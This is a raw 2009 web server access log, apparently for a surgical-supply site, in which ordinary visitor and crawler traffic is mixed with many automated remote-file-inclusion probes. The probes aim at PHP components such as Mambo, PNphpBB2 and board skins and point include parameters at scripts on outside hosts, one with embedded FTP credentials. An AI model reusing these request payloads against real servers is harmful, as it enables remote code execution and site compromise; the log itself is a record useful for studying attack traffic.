58.230.123.88 - - [13/Oct/2009:01:57:57 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.230.123.88 - - [13/Oct/2009:01:57:57 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
58.230.123.88 - - [13/Oct/2009:01:57:57 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:58:01 -0400] "GET /logs/access_log.Q109083000//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ihent.ru//id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:01:58:04 -0400] "GET /logs/error_log.Q109071200%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
58.230.123.88 - - [13/Oct/2009:01:58:07 -0400] "GET /logs/error_log.Q109071200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.142.130.14 - - [13/Oct/2009:01:58:11 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
67.142.130.14 - - [13/Oct/2009:01:58:11 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
67.142.130.14 - - [13/Oct/2009:01:58:12 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
67.142.130.14 - - [13/Oct/2009:01:58:12 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
83.103.72.130 - - [13/Oct/2009:01:58:14 -0400] "GET /logs/access_log.Q109083000//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ihent.ru//id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:01:58:14 -0400] "GET /logs/error_log.Q109071200%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:58:25 -0400] "GET /logs/access_log.Q109083000//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ihent.ru//id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:01:58:32 -0400] "GET /logs/error_log.Q109071200%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:01:58:32 -0400] "GET /logs/access_log.Q109052200//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:01:58:32 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:01:58:32 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
82.193.15.3 - - [13/Oct/2009:01:58:33 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:01:59:04 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:01:59:04 -0400] "GET /logs/access_log.Q109062900%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:01:59:04 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:01:59:12 -0400] "GET /logs/access_log.Q109053100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
82.193.15.3 - - [13/Oct/2009:01:59:50 -0400] "GET /logs/error_log.Q109071200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
174.143.3.188 - - [13/Oct/2009:02:00:07 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
174.143.3.188 - - [13/Oct/2009:02:00:07 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
174.143.3.188 - - [13/Oct/2009:02:00:07 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
174.143.3.188 - - [13/Oct/2009:02:00:07 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.12.99 - - [13/Oct/2009:02:02:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.39.130.27 - - [13/Oct/2009:02:02:16 -0400] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
211.39.130.27 - - [13/Oct/2009:02:02:17 -0400] "GET /logs/access_log.Q109072500//skin/ggambo7002_board/comment_modify.php?dir=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
211.39.130.27 - - [13/Oct/2009:02:02:17 -0400] "GET //skin/ggambo7002_board/comment_modify.php?dir=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.39.130.27 - - [13/Oct/2009:02:02:28 -0400] "GET /logs/access_log.Q109072200//skin/ggambo7002_board/comment_modify.php?dir=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
76.124.28.60 - - [13/Oct/2009:02:02:44 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C604B15F9E20030E800E+M37+ENG HTTP/1.1" 200 46882 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:02:02:45 -0400] "GET /images/items/1000203_THUMB.JPG HTTP/1.1" 200 1869 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C604B15F9E20030E800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:02:02:48 -0400] "GET /images/fav_a-b.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C604B15F9E20030E800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:02:02:48 -0400] "GET /images/fav_a-b.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C604B15F9E20030E800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:02:02:50 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C634F1EF9020050D800F+M37+ENG HTTP/1.1" 200 46895 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C604B15F9E20030E800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:02:02:51 -0400] "GET /images/fav_r-b.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C634F1EF9020050D800F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
72.30.78.234 - - [13/Oct/2009:02:03:12 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.78.234 - - [13/Oct/2009:02:03:12 -0400] "GET /logs/access_log.Q109072200 HTTP/1.0" 200 5101774 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.252.90.80 - - [13/Oct/2009:02:04:53 -0400] "GET /skin/amick+linuxbrown_b/error.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
203.252.90.80 - - [13/Oct/2009:02:04:57 -0400] "GET /logs/skin/amick+linuxbrown_b/error.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.252.90.80 - - [13/Oct/2009:02:04:57 -0400] "GET /logs/access_log.Q109051200/skin/amick+linuxbrown_b/error.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:02:05:19 -0400] "GET /logs//includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:02:05:19 -0400] "GET //includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:02:05:19 -0400] "GET /logs/access_log.Q109092200%20%20//includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
119.63.193.55 - - [13/Oct/2009:02:06:00 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
203.252.90.80 - - [13/Oct/2009:02:06:07 -0400] "GET /skin/amick+linuxbrown_b/error.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
203.252.90.80 - - [13/Oct/2009:02:06:07 -0400] "GET /logs/skin/amick+linuxbrown_b/error.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.252.90.80 - - [13/Oct/2009:02:06:07 -0400] "GET /logs/access_log.Q109051200/skin/amick+linuxbrown_b/error.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
203.252.90.80 - - [13/Oct/2009:02:06:27 -0400] "GET /logs/access_log.Q109053100/skin/amick+linuxbrown_b/error.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:02:07:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.252.90.80 - - [13/Oct/2009:02:07:49 -0400] "GET /logs/skin/amick+linuxbrown_b/error.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.252.90.80 - - [13/Oct/2009:02:07:49 -0400] "GET /logs/access_log.Q109051200/skin/amick+linuxbrown_b/error.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
203.252.90.80 - - [13/Oct/2009:02:07:57 -0400] "GET /skin/amick+linuxbrown_b/error.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
75.91.238.9 - - [13/Oct/2009:02:08:17 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.91.238.9 - - [13/Oct/2009:02:08:17 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.91.238.9 - - [13/Oct/2009:02:08:18 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.91.238.9 - - [13/Oct/2009:02:08:18 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
211.172.225.50 - - [13/Oct/2009:02:08:30 -0400] "GET /index.php?abs_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:02:08:30 -0400] "GET /logs/access_log.Q109073000/index.php?abs_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:02:08:30 -0400] "GET /logs/index.php?abs_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:02:08:33 -0400] "GET /logs/index.php?abs_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:02:08:33 -0400] "GET /logs/access_log.Q109073000/index.php?abs_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:02:08:33 -0400] "GET /index.php?abs_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:02:09:25 -0400] "GET /logs/access_log.Q109100200%20%20//includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:02:09:32 -0400] "GET /logs/access_log.Q109073000%20%20/index.php?abs_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:02:09:34 -0400] "GET /logs/index.php?abs_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:02:09:34 -0400] "GET /logs/access_log.Q109073000/index.php?abs_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:02:09:35 -0400] "GET /index.php?abs_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:02:09:37 -0400] "GET /logs/access_log.Q109073000%20%20/index.php?abs_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:02:09:37 -0400] "GET /logs/index.php?abs_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:02:09:37 -0400] "GET /index.php?abs_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:02:09:37 -0400] "GET /logs/access_log.Q109073000/index.php?abs_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:02:10:49 -0400] "GET /logs/access_log.Q109092200//includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:02:10:52 -0400] "GET /?appserv_root=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:02:10:52 -0400] "GET /logs/access_log.Q109051400%20%20/?appserv_root=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:02:10:52 -0400] "GET /logs/?appserv_root=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 21652 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:02:11:02 -0400] "GET /?appserv_root=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:02:11:03 -0400] "GET /logs/access_log.Q109051400%20%20/?appserv_root=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:02:11:02 -0400] "GET /logs/?appserv_root=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 21652 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:02:11:04 -0400] "GET /?appserv_root=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
174.143.3.188 - - [13/Oct/2009:02:11:04 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
174.143.3.188 - - [13/Oct/2009:02:11:04 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
174.143.3.188 - - [13/Oct/2009:02:11:04 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
174.143.3.188 - - [13/Oct/2009:02:11:04 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
121.78.82.142 - - [13/Oct/2009:02:11:04 -0400] "GET /logs/access_log.Q109051400%20%20/?appserv_root=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:02:11:04 -0400] "GET /logs/?appserv_root=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 21652 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:02:11:21 -0400] "GET /logs/access_log.Q109073000%20%20/index.php?abs_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:02:11:32 -0400] "GET /logs/access_log.Q109073000%20%20/index.php?abs_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:02:12:11 -0400] "GET /logs/access_log.Q109100200//includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:02:12:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.78.82.142 - - [13/Oct/2009:02:12:33 -0400] "GET /logs/access_log.Q109051800%20%20/?appserv_root=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:02:12:40 -0400] "GET /logs/access_log.Q109051800%20%20/?appserv_root=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:02:12:43 -0400] "GET /logs/access_log.Q109051800%20%20/?appserv_root=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
203.252.90.80 - - [13/Oct/2009:02:14:51 -0400] "GET /logs/access_log.Q109053100/skin/amick+linuxbrown_b/error.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
119.63.199.46 - - [13/Oct/2009:02:14:54 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
220.181.7.59 - - [13/Oct/2009:02:15:24 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
168.143.19.89 - - [13/Oct/2009:02:17:22 -0400] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 269 "-" "libwww-perl/5.825"
168.143.19.89 - - [13/Oct/2009:02:17:22 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 247 "-" "libwww-perl/5.825"
168.143.19.89 - - [13/Oct/2009:02:17:22 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 242 "-" "libwww-perl/5.825"
209.59.12.99 - - [13/Oct/2009:02:17:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
206.108.7.161 - - [13/Oct/2009:02:17:50 -0400] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
206.108.7.161 - - [13/Oct/2009:02:17:50 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
206.108.7.161 - - [13/Oct/2009:02:17:50 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
123.125.66.89 - - [13/Oct/2009:02:18:04 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
168.143.19.89 - - [13/Oct/2009:02:18:12 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 269 "-" "libwww-perl/5.825"
222.73.17.7 - - [13/Oct/2009:02:18:15 -0400] "GET /logs/access_log.Q109071700//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:15 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:15 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:15 -0400] "GET /logs/access_log.Q109090700//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:17 -0400] "GET /logs/access_log.Q109090700//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:17 -0400] "GET /logs/access_log.Q109071700//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:17 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:17 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
